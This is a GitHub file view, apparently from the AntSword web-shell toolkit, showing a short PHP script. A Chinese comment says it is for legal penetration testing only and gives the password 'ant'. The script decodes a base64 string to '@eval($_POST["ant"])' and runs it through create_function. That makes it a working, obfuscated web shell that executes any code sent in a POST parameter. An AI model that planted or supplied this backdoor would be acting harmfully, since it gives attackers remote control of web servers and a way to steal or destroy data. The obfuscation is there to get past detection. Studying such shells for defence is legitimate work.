FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
AwesomeScript/php/php_create_function_script.php at master · AntSwordProject/AwesomeScript · GitHub
Uh oh!
There was an error while loading.
Please reload this page
.
AntSwordProject
/
AwesomeScript
Public
Notifications
You must be signed in to change notification settings
Fork
79
Star
402
Code
Issues
0
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Issues
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
AwesomeScript
/
php
/
php_create_function_script.php
Copy path
More file actions
More file actions
Latest commit
History
History
History
19 lines (19 loc) · 849 Bytes
Breadcrumbs
AwesomeScript
/
php
/
php_create_function_script.php
Copy path
File metadata and controls
19 lines (19 loc) · 849 Bytes
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<?php
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword PHP Create_Function Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd = ant
*/
$
ant
=
create_function
(
""
,
base64_decode
(
'
QGV2YWwoJF9QT1NUWyJhbnQiXSk7
'
));
$
ant
();
?>
Back
|
FazBrowse Home
|
New Git URL